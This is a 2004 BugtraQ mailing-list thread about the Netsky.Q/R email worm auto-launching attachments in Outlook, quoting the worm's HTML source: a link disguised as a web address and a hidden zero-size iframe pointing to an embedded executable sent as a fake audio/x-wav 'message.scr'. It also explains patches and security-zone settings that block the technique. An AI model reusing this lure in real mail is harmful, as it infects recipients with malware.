RE: Netsky.R, auto execute w/ IE6 ?

[BugtraQ <bugtraqFolder () stcservices com>]

Thanks Jim, and all who replied.  Updating MS Office w/ latest patches
solved the problem.  It appears it was the iframe issue you mentioned.

Here is the message source for those who asked:
-----------------------------------------------------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>

<META content="MSHTML 5.00.2920.0" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff><br>Mail Delivery - This mail couldn't be
displayed<br><br>------------- failed message
-------------<br>?2a$dmd-ekH-U?3C)7>JA!p|jxvM>g;öOigLW*8hiE<br>G1!K&o*(yßKAL
#s7sMJwAmS2105NtW3%efpG7?$V)4(vf#><br>jHtC8HWc4VfUgtU2l55aWMD.PJK7.YD8bä:)pa
cn|$qhz<br>Vü8sßZmQV4goigoLHcu$w%1hxo|ACKw0B8&ßOvüma,ö<br>V&;N>1:G<br><br>Me
ssage has been sent as a binary attachment.<br>

Or you can view the message at:<br><br>
<a href=cid:121401Mfdab4$3f3dL780$75387018@57W81fa70Re height=0
width=0>www.targetdomain.com/inmail/webmaster/mread.php?sessionid-20302</a>
<iframe
src=cid:121401Mfdab4$3f3dL780$75387018@57W81fa70Re height=0
width=0></iframe> 
<DIV>&nbsp;</DIV></BODY></HTML>
------------------------------------------------------------------

-----Original Message-----
From: James C Slora Jr [mailto:Jim.Slora () phra com]
Sent: Friday, April 02, 2004 2:30 PM
To: 'BugtraQ'; bugtraq () securityfocus com
Subject: RE: Netsky.R, auto execute w/ IE6 ?


> I have received several emails (W2K, Outlook 2000) 
> that appear to be Netsky.Q or Netsky.R.  When 
> opened these emails launch the attachment automatically.

> Just to be sure, I did a windows update for all the 
> latest security patches. Even after this, Outlook 
> still opens the attached file on viewing the email.

The MIME vulnerability should not affect you given the configuration you
said you have. 

Netsky-Q also uses an iframe to try to autolaunch, though - that is probably
what you are seeing. Your security settings in Outlook are probably not set
to protect against iframe launches. Make sure your mail client is running in
the Restricted Sites security zone (Tools>Options>Security>Zone Settings),
and that the "Launching Programs and Files in an Iframe" right is set to
"disabled" within that zone.

Netsky.Q uses the following methods to try to execute the hostile
attachment:

***** The social engineering setup:

<BODY bgColor=3D#ffffff>If the message will not displayed automatically,<br>
follow the link to read the delivered message.<br><br>
Received message is available at:<br>

A clickable link looks like it points at hotjobs but actually points to
embedded executable:

<a href=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0>www.hotjobs.com/inbox/serviceupdate/read.php?sessionid-4524</a>

**** An I-Frame tries to auto-execute the embedded executable:
Prevent this by running the mail client within the  Restricted Sites
security zone, and by ensuring "Launching Programs and Files in an Iframe"
is disabled within that zone.

<iframe
src=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0></iframe> 
<DIV>&nbsp;</DIV></BODY></HTML>


**** And finally the MIME type vulnerability tries to auto-execute the
embedded executable. This exploit should be stopped by IE 6 or by MS01-020.
Your computer probably does not try to execute from this.

------=_NextPart_001_001C_01C0CA80.6B015D10--

------=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: audio/x-wav;
        name="message.scr"
Content-Transfer-Encoding: base64
Content-ID:<031401Mfdab4$3f3dL780$73387018@57W81fa70Re>